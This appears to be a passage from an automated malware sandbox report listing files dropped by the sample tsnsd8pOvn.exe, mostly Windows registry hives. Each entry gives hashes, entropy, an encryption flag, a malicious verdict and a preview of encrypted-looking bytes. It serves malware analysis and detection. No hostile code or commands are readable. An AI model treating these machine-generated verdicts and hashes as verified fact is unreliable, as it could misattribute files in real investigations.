                              Preview:regf.-."..b..."..S..@W..@....u.$.i,.C.]..?.#.OS....h...^#.I.Np....aM.lW.j..ds...Y(..S(....A.....T.4..GT.?..G.h4b...6t.Q...i.....Eo.........k.@..9..../....`.*....^Gv!...E~;.._...bYUB....Y.c.Z....,..f}.{.Z..Z:S.b{.T.....v.i...._...s.. .*v.E.eN..P..C.....Ft.i...vZ..pw..|N8...1.}..dT.... ..6..W.;/F3...Z:..!.D..:cs2....Y0b<.33......\.[`.#..Uh)c...'.+...&.F.0...h..."p.9......d>...^.Cu1...d0...Y...p..D2....\...!A ..kF.n..4$.........5.'..5&L .T....J.C.J.W.J...^.!..#.3......k..W..2.].....(..e(.Q<U..`.9...ZQ.f.......Q.a.9..Q..h....v..}...7]8...n....G.h....).AF!.9p./7.P.6..1....C..V.........1..>....w.=3..x.-Bz...%./...hR.=...w.../S.M...Qlw.'.e.'.]...n...k.nF.0r.=.].fI.E..<.8...1...k).o=......$o.fd.I..<..._w..dT:.K....a.,.?^&.....a'....7#.H.b.s..b...E...)..O.F.^.}.n.^.9_..R..6.]b.);.S...-......F"..P..v.+vB..+$.....\....ouh`.yb.W.j.....P..*"%2.f?T-.b..6..........Os.o....d|..t.......2...."....p..._.h..1.w..Y.q.8.U.m.-y.P....m.......\..v2....j.........A
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:DOS executable (COM)
                              Category:dropped
                              Size (bytes):36540
                              Entropy (8bit):7.994861522915828
                              Encrypted:true
                              SSDEEP:768:gyyyp5LgwXET5ODWk6R6Mt7EBum+InpKa7Q4zCvx/EX98Y7TB6D:XPrMT5ODWk6R/t7E0opKaxzCdEt8
                              MD5:7C6D657AE8EB5F1A3B91CAA2A5BB97B6
                              SHA1:67C4D84AF41AAA4147372F0024E52A82FB126CCB
                              SHA-256:0ABBE2E31AAA975F9BA58115EAE3660F0BE6EFB6D1870CE2111E129D4B048A66
                              SHA-512:C1F2B4F35D5753D0DF07BDA09DFDBC520727D96E116079E2EF44118ADCB859B5950965C7B441C5A967BC53348BCF807E1F8FB428912FE79D97762F37D94EB38C
                              Malicious:true
                              Preview:.u.......Eya.x.l.=.U.g..c...Z4.N8.F..~.uEQ.p:.D.x.*M....C@u.PK...C..cW..f.'..y$+..x..;.a..... ........uR..$.......p.vA..X.A.........cy.}j2..O..`C..>...Fe.~$h..s6.........~..:...../..j.1...%d..Z.`.w.os....K...X...=Q.p.$\%5..1.eF.n.w..X....%........|..1.}..j...}.S.n.,{[.3~.....FTa.~...A..OhL.C...($.s.^.W..Le...SA1..6\.....=...(xQ.D......A....B0...D.th...{.v%n40..'....f..|B.....#......_>.....>...K....3.a.S!JyNV.....q..-....._.2........l..p.f.z"...L4.$.....kR..r.{..v..0...Obm...t..*...:....o..E.u._..$XE.'..k7j...B.....:.....u/$%..C...Jt-..lg....N..#&m.....x..._...P..'cF....TU6..../..8....o.X.1..E...e.c.TY,\..l3X.J}..5.x.t..]5.RIn.I(%.s..E..yk.Eu....o[..*..*....Q.Q..A.t..k,.%.Is*.8I..r@..R.)~..h0~.....~1V..78X....W..=...<.^..[.V..v3.y..$...W.}p-.M.P....0..C=.J7...e=.l{.M.z.....X.>.?.[..?p.B....~[!....T...7eT...du .. W....y5.D..,l....o....y.A...Y..h.jco.(..4.b]..C._...B.w..X./.d.}....e:.Nv.....|....9.f-qp.&.e@a4o.P,V;......?....e.F\]5....E.....=.ILN..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.974539955116368
                              Encrypted:false
                              SSDEEP:192:SklY3n9CnVGafj/v+reLnaD5VWUCkk5DdrWc7NdWMf:o3nMVGcHCenaDaUCR5Zyq9
                              MD5:3386B5F37A8D83274F3EDAACF48ADCE4
                              SHA1:89766D0580EC4B11E92B1CC511981A268F549D58
                              SHA-256:DA18D1133B58BDCCF816CC187CC3355686E2509659A9CEA65997ECB262A1D6F0
                              SHA-512:212B132CDBC809ADBB0B322F7C2B443F38DC36F0B14B8EDE0DD7A8206EAED11A6509BC3FE3FDCFF85FFDF0A9736851646DF5596CEC5DFA84A10612730FEBFF56
                              Malicious:false
                              Preview:regf....>...4.).x.r... .|....<.C..dQg6...Y....M.......}...e..-^x!.. !..|ju=@..j.=Ls....Ci[-..&<.bZ.^......vI...u+...t...{..)/...a[W....y.......[\Y.o.Ao..?.....g?.....G./...BG..v.....W.%..}[,...v .U....;5.$.(..+......X......`..4.n.S..Y...t........]..>..U-.@'U..&..(!.JzEB......G.#.>.!.x.<.....g.~.........1._.&.....q`..[.h{6.:..W........<....a5R...l..V.z..o..=P...q......x.T.c.........Eo].P5;.kX...C.9y...N.F............j...d...T<g..1.n&...d.....`. ...k^9Ln.......o....f...wA..C...w1k..)_.DQ.....k...j...J.]%sWs.R...T..j...+..{......Ru.....Y|y..s..a..kb.-m.L.....Yo.....n.=w/.-G...A...>d.K.]...*<....DG..7.z............k<Es.p..9...d.H..K....QX..as....P...).$......%}...Z...E}..#.IEazx...%....{...r.];..:v.l4....-...w*u...|.?....j`A..q6...b:4Q!.6.S..t...Q.y...o...c.....-R.X.Aw.e._.....j.7.....8c...g.vD.(:...?j}.FD.....h.......W.`..h..=..1.&.........>.m...G....G.B.~..+.\.k...AxU.E.?+..VH.l`U.Y~.b..s..w...D9<.......x..*"Bl.v...{......7.I....qc.K....`
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.974718224280075
                              Encrypted:false
                              SSDEEP:192:21jRs/+q94xBihUL1I6HuWm1leTjlZKO2ULOzVKL48zP/tQTbZf:21jREj94xBLa1led8OQzVKvz/ubB
                              MD5:43740CA2D7E4E6C3FA796E39DA6A50A8
                              SHA1:16717CBA15F5A34F60C4F76F5F89E614B2231C69
                              SHA-256:1576E19E61C45AF5158607D50BFA57F67F1676F92061581EA651E2BF98289B56
                              SHA-512:73EC0FE472B822F5004CD52674C79CD7CCD5F370FAC17DF78B5F6AA0C56DA810678412D7581237DEB1E9C29DB6E3D9E9DF1E237DC4FC3E1D5515794A183D4DE5
                              Malicious:false
                              Preview:regf.p.r.{........w...V......]..U.......-...Z..>.zXm...V~,.i}....R7...,.S.c....o.2.c...$F\0e:.}I..L...y....hrS.k..f.........L.$.u.)B8a...?O..{i...D........k...n.m.xw..........5y.....y.......s.E;....2....Z^..A.ao...\.V.y.'.[2.....U..$...l./...Aa......z......8..Z.kzE.a.2....=.. .x.c.....A.Ck..@R.m..%....y..p.X.....P.......L.S3..?......>{F.....k|6......W."V......Mi..0[..b....cozj....'*..h../.........$.O.e.0@.<.Y.....w).1D...../+k,.@R]F"h.J.P.a......;..%C.'c."s.<.P.i1K..S9.#lB......9.....m+i.s@. .)QC.K......3m....l..%.F.Ff...S[@.'<..a......Qu..d.B...!........[......WaS..(.._....e..g.[.`./.w..........w(.Fz....i..oA.=.k......`j..W...............Yb.1..EM%?.....?l.'.p...L..I\s)T. ...4tik..._.]Y...>.o.."...].+n=OsK.v.+S7..u.....'.TB..(U7..."....E....j.T.^S..3.48.^H..g.....:w<.zQE.QU.....M...o...i.R8.sT.6...ha.D2......=;Mwl.....B....u.(...-..[..(..C..P:.4...o.u......E..<.K..o..q..Dh..|<:.7x...tQ...hGp......."..R......q..D.I..A]..N.'0...'.b......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):16718
                              Entropy (8bit):7.9870587070299965
                              Encrypted:false
                              SSDEEP:384:JItTF4m2NhNlj+VKUh4Ci4jJEa8w5iiZpCWfBg54YPfbssGO:JIkjjLqV1diwJEbfiZ9/Ts5
                              MD5:82A4C538B9B6F04B0EE6069B33EA8AD3
                              SHA1:6C35CA06101CC8E99AC6B82AD5C0DB6588C64E1F
                              SHA-256:1F22958C34F70A42515FFECB8BCFEF3AF2937F7F6D9EDC45EC299CB73347FE83
                              SHA-512:964C632F2052B996FA0230C5468F9FEDCBDA20600DC3AE7532528D83E3B5B1A8C43990EAFC2EFB3346B0436030C0F4FF7E9B8B3A55BA53C119716412932EB309
                              Malicious:false
                              Preview:regf.{.@).M.$......JUp}(..K..S.z6..G.G.....A..Z<. ...~.X.*.'.rO.@q.....]...n..@yc. .b.j.)cpo!.2%.x.d..;..&..N.m$.:l.....-ow...B.[rr7.{-.....e..ut.$.M.jJ.h. bl5.......C......3.....&....R..n .G.`.r.^N...u.$.....|.....T........eqa.v'.r..."..QI%Pa...Q&LX.f...G.G....`..v.\0..d.....F4,5.N.6....C."B...-..t..?..mf.;.S...-^....."..#.{.F.....r.i.....C.~7.....d.%...T.|..Zo..]b..Y....u.......g....$8.........y..R7b....p..W...I...*.$ni..,...V...".4+.,4..D}.. ..Q..iKR....ee.._.....q@ ..8.....e`......s..e......P..pkg..p.'.xG{.[p..")...n.._}T|.|*....T~..K.K...B#. ...V..Y.....6.......'.h3..m..q..8....m..D$.5..zM.B.../h1.-...I3..C}[.v~}.SV....D..s[.........z.>.Xn....((.g...mL.}.*.um..k.0}...M.....8...h;.|RP8..W..g9..hD..u.x......i....K.y..=..;...I]...t...DM.."^.....]...wO...$.....PKw....tI...]..9.....=.....y....i.;.].<.0.p9..#zh.u.w +.sF..98.......[..3........d7.K...{Y.V..}..$<d..Vt2..e...1..,NJ..-...8.9Z.X..%...~.4..M0.a.E..CMh;...\.:f..t.........}@OU.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):33102
                              Entropy (8bit):7.994574726826892
                              Encrypted:true
                              SSDEEP:768:61hrgSPtM5f35LXxVh8RV47rF+7ZOvsgREPs3iuvuRUq/h4pC/HS1rY:YGSq5v5wV47rF2zUEPs3NWUJ0/HSVY
                              MD5:B19A0C8F0FD0845787D3A80B434EFA98
                              SHA1:756429A773A7E728FCDE2A54499DF166E30D0F30
                              SHA-256:3B5709C7B44820A8A405E014229A429DC8DF5FC59EB2DD082E3DC9F6F0568ABE
                              SHA-512:6E67D7B5A75B1C6485BEBBDDEDA13F1CDE529D132A67DF1A512E616CE65E284C8F6B6EEC79AD41078C89D95D419279BE5FC5DC499D366631A77640FB1D29AFAE
                              Malicious:true
                              Preview:regf....WKG....?y.E..^|......g.w._..\...Mka..F-....;.Z.1g.........F.k ..,.n%....l.W.7..%.VP|l_..(.f".E,aCr....9{=>ReM...<..c>8O.z...]u.O..zq..8r..T.9...]....6%.g;...7...n..WN{...w.....N..$...1w....N.......c.j...R.T....>.i.l.....h.p.m..L$..Q......=....1Je...X.......*9p.a3h+.m.....ER.S.Q.O.q.......g.....+....;~.G...b...w..[1..1....{.59p.C.#.;Y.$V.g.......5..&.L..j...m........cR...K..qE._......H......%..+@c.I..u!..K[t..)X._..R....../.p..l.......m.B..9@@%..!a..&L.......I,..abbT-.d9..ry....X..~..#2..}...[i..Hhr..C;F...3..ucj.*.p..z..&`../.1.k.....*.n.P..@.$.e"8._.x]%...n....~..g....I_.!.ah...S..........R.^a.....#c..<)1.z9.cV......+..z.8co%..K..6.b"{.`D...8L......."..g...(%h.8..R....%zm)...nXj.."1.....h...[.f>.....O.0!n..........T.....l.'.l..s....p...I.?.7.... }]&&..;...C.2..2....&.v...SJ....wo?T.e......-/&D.4..E.x.b..d..R.w?K.Hz)..^..".[d!.....S.vR..KQ..~...........X=#i^.2d............._..V...............x..P.&.>e.._........#._jh.)Z.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):16718
                              Entropy (8bit):7.987634153033241
                              Encrypted:false
                              SSDEEP:384:mQHkyD/QVs5FFim60geQUYc+3D0KB0R56M3n:JZDI257im6zeQRA7Vn
                              MD5:C928E52EA169F90881966C8D445B6D0C
                              SHA1:ED506379C8E78A36C71C6A8FC94B47D3DC513310
                              SHA-256:BD8AB9B2BE63F53E99D07BD3DAC37543149F79822FB6C1CC45AA2B924BA9CF9A
                              SHA-512:181EBD9B2BDFE9EAA886235ACCC7F2EFEE843830EA9265729C2786C74DDE2ED7D7E56258F3A0D8C38039FB1A53F17387DABBBDB055D04F27DE089DD17F88B6D3
                              Malicious:false
                              Preview:regf.v5I.'PB4c......f..y...E.I.av.W......$.z...{.3\...........&%!uab..S.......3.r$.n.z.a.1.e..7...E...<a!9.%/^.]..#....w.Y!.vw,...X._..w...a%=Q.R.T6.;.....W.D...j....z\..G...bt....O.Dfg..A.q9....<J....J......@.$.!....7.$..7.)#N.Z'..l.p..,5#Z0rj.9..If.t...o.@0.....f..]k....vl...a.tvdv...=(.e..w!nZ4..s0.A0..8.x4C.Y.Y........9....?O_..L*.".VP...O.>iwq...63..PM{-.+....!.\..0B!..'N..(..x..c.&...O4\.xMH...z.....\z....T......x....c#..V.{...I..8/...."... ....3.D..-`....q..Z.......,.. ...d.).68.3.D<.......l....ba. 5..........h.=...A!.....B<.}...9r..AEG.m.1.|&......Y......E...0..5.Z.,w...3P....../TR....>.u/.q.$.....N..M.m.o.N.9U3.).........L7..x.8.o.....a..............2Q.X.%...%...=..S.R.....Ux.BR....#.{.0-I.R(...W..N.Z..&y....v..!....|lz.S.X..:..b....e2...DT.....F.4..T.#2@....E:...i..<`..@...bh.b.+.eB.,.A<..(3<.Jc.Y.JAo5.....y.X...*.H.~.....iq0..!....7.....H>...C.`G..r..6.i.IV.)}m.u`.~9.@..A..#jpg...{.;..F.L.}.."..,.....S.f..!$=.=H..e..}...+.G
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):45110
                              Entropy (8bit):7.99591413099336
                              Encrypted:true
                              SSDEEP:768:kCiA71vxlqsFFTKqZJNSty5OWr+KHzIZ2KkVuZwI7qRHm0TgIM4LxzSsdtTFs9AC:kCR7JqQTtZJ8tjWrRY2lMeaqo0c4F6AC
                              MD5:386EB926CAEC724A995137B8F728FCE2
                              SHA1:8E147E4DDA88D6CCC4C813BD9E6FD5E385DBC196
                              SHA-256:E75E54B2ACCCF82343506C03C5E69AF3EDF218C535F03E7628C69273C40CC52A
                              SHA-512:BCED10A38FB98E2EC4A54C8291653D8E5D18E14393DD4F475B654F43B09CDDDC0D26AA07C63227372553CD9E8BF330565500EFD5AAE3F4824DEEE8F5D6C0C66A
                              Malicious:true
                              Preview:G.o2|.v.d.....7...%.97z.Rf..gl-Q^F.|t..M....\Z.......R>.Z..........g\.D8.*.:...\..X..#1.r#.^#.P..mW.g...'.>7......!1....n...N..2.J..r7..9.^......[..%T..6`.}.P.g...6J...uY!.D."GE..OQ.tU..DU...v..i.f....3#Y...Y.\...h..D.6..h.......Q.m..f@..P)g.z(.6)?........./P.1n4..3.P.K..J........6.RH.z.... .2.'.a9O..Z.?=s......?..x.Z.g?....U.....Z$......%...9...s/~N.b1....ms.7.O.CSN..Dr...i.d....\S/.eJ...K..m.v.....4..5.`..!.e....3W........i.....dhl..Q.0...N.1H..<......#..g.. ...m.>...{._:8......."m(H@.,.$.3..S-..6...w..+i... ...u....[..=.N..7u..F......>...4...?..Cd.....W.h-#.A..Hm..M..I.......Ue\.. ..<:.....+....+.$Y1.h.........t+o.....5m...h.q.6.......H...{.p..L..c..#.!...q.sF..x,.;...aJo...N9.qE.vB......N...>..3..+>..F....e.!....o.w"[..q....I...p...e.......Br......Kk....4E.oC@W.v...7N..n......>.8F-.........8z.....35.{i..._.....&7YZ.}......EF.:...@c...E2.,..t$/. ym.......[.2..!vuu1.........R.P!.].F...P.#...:A....@W..j....f&.h...........Y..Q*s
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978319341830583
                              Encrypted:false
                              SSDEEP:192:W97aKRKcsdB52WIv/ll+Ln31dON4h8b+3x+cIF9qmqXipiDlrRSqiBe6f:2mvHh0/GrXyb+9ftXEildyZ
                              MD5:62745C721565379642EC593F5DA1EE10
                              SHA1:7831BED39055872D8F16DE1139AC93829D7A7FF4
                              SHA-256:18F4405CDBCAFABBAE65E07B9A7314317B49F3AD4794B070EC95BFAF4A83833E
                              SHA-512:7F055DAA04CD9D989C1F8077C96A1657CF13D62DF8A63B67BDD5FDE1CB824BDACCEE0436F8F39B0FE24F736FB457C053684F0BB9050C80B128316C2330D5D37A
                              Malicious:false
                              Preview:regf..T...m...;...A..p...,_.,Y...2...7.)^.".ku{.jg'.%'9.....6c.....RN.Q|..W..4.......X....^h.......5.."M......^..y.^J...P..i.~....2a........7..z`{.&.Z..j.m..v..W.....=b.Ji1=..r.M.:t-K....Im.e..m.....|.d.ap8.....Pk.....Tz....`#<M.-.Ii<X!..{...MS....6....K..\...../.>.K..p...pD+ .3..~.r.$...AnN....h%....+.._f......l.)r..=?....AH...{\.B....vVZ...vh\.|......b...%m|..^08zT^.Da.......H.>,W.W2....zZ.e.a.w..*Z._)...h.H...M...bO.E...~aEr.,.....>3....,..$...I.+_..).u.u...?............$.?.+j..c.Y...{.H.=W.#>.}T.....].nn3.n..t...Wp^H..e;.s.bkQ0.jI.?y..'......O....z.'...A.]w..Q...c....Wv..K|L|@f..*.o....~.vA5.B..;.......b....vy...{.)....\R..K..s.N.....Qm.>j.;..K....../...=..... #..t=.~?`.....$/e.gRw....0oxjZ"..3..i5.jKe.t ..o.-?w.W..........%..]...!`...8V]..*..[e.('.s...D..D.c.........;..3.9<...\...b..qU......"...!F( .n.."........W.?.\..Q..$.y.....Jz...."..0m(}..c.6...33.7g...J..&&.f..Iu...\..W..q.(.bY..5.7~S..,}...o....xp..M:kxe}KD....o.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978454568684321
                              Encrypted:false
                              SSDEEP:192:sJzR1KQ6TjET2QZul8nA/vFRr49QFPjkG8/Pyavf:O6k2QZul8OtF49sPjR8/PF
                              MD5:420B6E9C61043E9527277167E8FBDCC6
                              SHA1:C5B488F60334FBD70F139AD387EABA71309E635B
                              SHA-256:99AD6639D2CD1BC5C5567C39D74CDFC446FFD9C2ABDB7B003A81E01887473888
                              SHA-512:419B441C90B2A0C8F803139A4FCBC3C1802777B3C110C40A9024DDA3EC6FDD5C83679A782E4C43CAA5C204E1F7DC9F55E67AC564030A34BA1446ED8F614207B8
                              Malicious:false
                              Preview:regf...h.e..r6..,..+.....u.].l-.?...w.T.......ZWY..d=W.~.......... \..9.....[bH.suc.....1.......m...(..y.ad.D..,z...`...z.[..s...`..v.z......D..f..U.......4..K..z.:..[A.N!..j.....w.5.Z.,!..1.........}....5.9.&.0:K.]..0MpT=8...]V3x.2:.&..O.sO .,....Q.\O.m%.U..J.....]W....NB:..w...<.../..@..^E..B.Q.C.Q.o.N.>..^?.K.,..C....i.a.".nU...UZp.;.q.D....-.F..&.*..!..).s......:\....s... H.R..8....I...M.h...g..,H..5'a.^Z.tL..$jd....W~ ...]O[=...p/..w..$)5./.U..).]|.7..a7..I1P..Ie.3"..............yYr..5.c.(..=E.1l._"R.;.......M..[gO.$........_Q....Y...../&..C.*.Z{e.. ..y..t....l.9...{?...@*......2.W3+..C(...`.M..8.....j..&.Im..m.i.b..8.. R.D.G....p.=._..m...S.(.....\.........2QE..1.t...n7s7v"..Mk....)..[...~5(.1Y.\W..9x...e..(.3'.|.Z..Z.......l...!.....\...8. ...#0.V.P9c!..C.s..4.7..:.b..b...{......za....c../.3..=...=.G2.....fv_(A..T%.zUR.P)b.(}.?....".@X...Z..<q.Fy....t.+.W.xI.....X...vN}.E_w.6......^.0F..M...[..~..zN.ca.......F.#.e...).......Y...tc......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975309293941875
                              Encrypted:false
                              SSDEEP:192:ox7eMpOg8EU95Z34Ai72Uugbl+aPcSeIMVf:u7D7fi5O6UPTPcS32
                              MD5:3ACF665B1A2BF5DC66198C237B40905A
                              SHA1:449EA8FB210494A9EA144B1D4F5FAAE3B3CEB2E9
                              SHA-256:71BB3911EB9EE9CE259238C9C32DBA17F840B06FA7AE699AFFFA83DF3F779C42
                              SHA-512:A741A945E05B329C2EDA38C6ED9E0AC273ACE8988D27C3C70CBE9C03D7485A806B1C3FC72D81765C89C221A089830FD79752739B01BE0BE0C74CBDD828359F4B
                              Malicious:false
                              Preview:regf.rK.sO4.B...f.p......Ip.e'X.vv.U.....p......x......T.hqizq..$.#;[..4...,..!.y..1 ....k.luJ..@.......U.`....w...)....q.y^.Re....T.....,I..7d.Eg53...>..!;b....`.'%WB.?...k..F....6...!....O.*u.(.G..{......Y...'.......>y.h4.k....I.[otY...&F.A.C.mrQ..v.f.y...\....*..ns..D.u.:......Zl...........Y..$..`.9...B/.*.S^.....2......./.2..%...U..:a.......F`H...%8t*;.....K..g......5.I.[..67UT.$.x......>.n..).....t...O.E...+..+h..."....Q>.4y'e..Eo...|..N.&..$..:i.qhF8..l...cx4.xD9-BD..#|.A"^...bF.\..^-2;/n.G.b>.....B.|.q..:. .rt(M.......lv.j4.S...F...sm}..b>A..\w.]j..z9....*3(.5Z...w..6L....v"....M.1d...j&.N.\Jl.Wg..&g f[.r.....aO....E....%q..Zex..<&rQ........2.FT.h..^.RSg....mQO...."...)}...R>..q..i.L.s7...u.."]..'0.1..H..D........K.......3u`.8+....dWf...V....L.....-^*....S....xe6]...M....h.....'...5%6.5...@......V.[.D. .d...;..H..=....l1....q.|.<.R|..`7v....M`.G.v...M.......k.B...U2......A.DJ......u.Hr....h.(O.E...s3.D..m@$.'..,...r.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976405387822575
                              Encrypted:false
                              SSDEEP:192:x34iKFClskf+Sh83YjEBNBoSOAs3xCpKIyqYsHH/V3woQLG2f:lZmkf+LIY78xBhMmoQCA
                              MD5:A55C518ED5B24CF03B2AE0B6950C996A
                              SHA1:972518DDF27ADAF9A0AECA79506CE507A28674A8
                              SHA-256:E94A81B300459A9C4F5938435DC013701EDE9BC523D96CFB8A90FA01E728F8BF
                              SHA-512:3737007EC8621B73158766F9BE48B2BA5D7194FF4C65359FB8E2B09DE202F69B2574BA6143BA31FF20B80F2111E307C877E8CA85400E8B4AC36161AF4C3435B9
                              Malicious:false
                              Preview:regf...K..m.A\nr..A..uE....u.I.]k&o....z.W..............K2sl.....GoC.........V.$..4.>..V...V.QIT...Sn)...9^.m^U.=U..D.sT..8....B!.._.y..(.......G.....k..zb..........o.y.k.r.C.>..d...b.r.Dc..U.......k.{<..|.r..S..di..wSG.)3...Q.M@Yr.K.6..5....|FF...W.YmI.;x..*..-.ft.~..#.:......zgT.A^.,.....5.>-.."a)y.2.W.L.+.~..(..us..l.\./.....<..+....*9..\).........r...^."..H..... ....C....<.Bj...jN..L.9.>.h....n.....`.... &v......Q.w...2U.y........(..~H^...UfR4.>:.c*....6`2.w....tE...H..eX.J..E.P@O9...P..t".PY...y....5:..3`d...}c.......-.D...|i..'.ZZ.t.V.w..o.h...4..r`O>..Oi..c..?.K..2.}V..v......yF.s.:_..........?...Y.>e....d.k.>R....1[FX..C...^.*...L....XD....E...#...e.(.dp...q.P.v..........v9ri.G.3...*svS........L...~QF5D.E...N.4.p$..<|.k......Cc."xX.0p.Be/..ra...:.|*..;.w.sH(..J/.#..U.......fB.p..&... ........#...2...U..V..8........b.f~.....q].]..y?9.nt.v.V.......(|..PC...=M....n.!...u....x_,4z...).`....r..#..F..{T... Xw....K=J.<.....Fk7{........oP..._..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979872392213141
                              Encrypted:false
                              SSDEEP:192:JQm6YVYBpB8ju4wJ112hlgE1R98qsDUWyqM/XEgA07f:JQ3YVYXrLehlzRIlM/v
                              MD5:D1F8F53188942E3B8CF42CDEAA5D9A68
                              SHA1:2AFB435CE88F16CBBFE038D8228F8B87703F55E0
                              SHA-256:C6715CA302533297D93A6220A457E248FFF70E88BB044C21E5871FE463BDDD19
                              SHA-512:344A48C384722100ECCD1AEDB3679C008D2E2BED5A1058A165FA06679C4FF14D499F5DEC1D5785BC70503ED46FE4E779224D3440E451642C1336CB30A2DCA87F
                              Malicious:false
                              Preview:regf.2...:.-...I.3tx.h........wgNh..Q.fi_VF.I.x..I..@....4...*.C......l......Ab..'../.../..v....-?c.....L.p3..*.p.[.zu...C.-L7...w......t..Yb2W..........+.A.8..<....Oi..MD..P.d.*..K."U..d...>..Z|.;-.a.*....!/Ii.......u.....@.g.U...y...V..p.~.A...s.eT...5sB..w..)...<.T......I..O....e..J....%.....t.$-...i.p.\..&.W....v,6.P8]..!....`.T.O.UN...d./+H.G........).=CO.&.X.......#,.$..W..?.$Y...Hd....`p(.Y....k..../8.&.-..M........y./.*..N...W...J.z..[.#...c6.Mn.....,..J<N.....E..Kg...#.X.\...v...r..i.#+..]...dU...X...FD..-%.!........H.....4...g..cn.9i<>.iz......"4.......+M4...v..!)....Rh..m.].d._......heOI.Q..8...h....{f+..G..zm.D<.3.kCK./..;.,...Df5..+m...{$.....(...l..t...tY.0...O.{ .GG.h.v..[{h....3Q.pv.3..H......G..u=.......u..e..p...|...4.<k.~....h"*.{...mv.>f%...]-%.....KG...~e.o..,{CU..".....j..........Q_..6.M.L.4..W..D.,:....._.\D......Y.39.+Mn..G..m....8.:M.9........8...up..t.e..(..k..%....k`..i.?...&....6s. ..U.!8....._...k>.p..-.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.981159604364473
                              Encrypted:false
                              SSDEEP:192:O99TcvKPslihXowMVkrzxjKmeq5m59GtcDZIFpWeH2oTPF4QZf:q3tmwMVyzwmlm59GtcDZ6BHZTPmQB
                              MD5:C448DF063CED44657D5E675BE0E720DF
                              SHA1:9445E0EBE2C41248E8960E1BE1625F3856ABB1A8
                              SHA-256:E9CAF95C22319CFDBFC436248952969567F43F2EF3D50C06CAB5B569374C7AC9
                              SHA-512:F2BF6BCCDB4E6182CF624F9A334A9B2663A4B79608FDE2775214C1C79B5DA96B72CA1A87D386B9DEB372EF5600466F2C9BEFAF57F8352ACFD2E5DA31BA12420C
                              Malicious:false
                              Preview:regf./..k2k...l {....Xf.{.,&..d..b...d.])%BH#..3Kag.A...#.M...V..Od.3.v........*..f.W.......... '..vS..V..G...|...X.AQ.>W...No~...8_......bf...?./.z.Fl.....g..f..M~..o,.s'.V..g#.x...:G.}..~.#9.Gv.%.8.~...K.0.Z.T.b...$..5k.../.....;z.q6..F.8.....ah.nLJ`+....D..ac.........Q.Nf.-.?....A...KX..bl$.'........`mJE........L8........&.gw...-g..Z1\/k.=p;.KK.w@..cw0..e.......h.8Gh6 ..V....PRs.". P.......E...R.1..@.:..n......(.Wg.).=.~....I...k.m..H......Y...y.._e.^....V..._..3.T..~(Q....0.R.I._..Xe.TB{.=Cp,%....oc.V..^h.}.S....$.X.Q{.......}.'.....Q...2..\.t..`A.......'36.....sE.M.+0...%+[?.HG....<[.u..zT..K.{k..7`..C.>cU.3o..E._W..;....v.$.s%....m.,@...}........-..*,.|.....=.jPxn.'.c.....Y.I..p..V....?k[..N..;.X.T.>.WM.....J.T.1...n...:.,...d..U.o.ml\U`.!.AW.....\I;.......O...4.Il9.....4..._..?&F....$}I.&o....Uk...]...y...b..6D..9.V..P.4.h....2..j..r.o..-~..(Z ..{..^..<........N.8_..J.,n.H..bW%...X(...P.s5....f`..ZJ...Y....j..."..[..,...b...F].VB.|X.B...H.n..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9778727678179555
                              Encrypted:false
                              SSDEEP:192:45mznCevlfHvpO2zippzGhGCfeJbEYwZQf:wuxdSYfmbEVZC
                              MD5:979B1123FACC8D7DC5F0EE18BB4D634C
                              SHA1:4FB9B49D9030CFDFCE3B296F70F9261DCFD56F78
                              SHA-256:681621F9131A52FE951275372C24EC2BA899FC05B1A3D14C506E24F1984C3FBE
                              SHA-512:507972AB379EC515D7F046F97C6EA500A6C74CFC8DD7F886B3D9FCA7D4DC750396C74D363D8BF8E8BF75A27C50B2D720F58BEC004B6E190A620351FC03A35EA1
                              Malicious:false
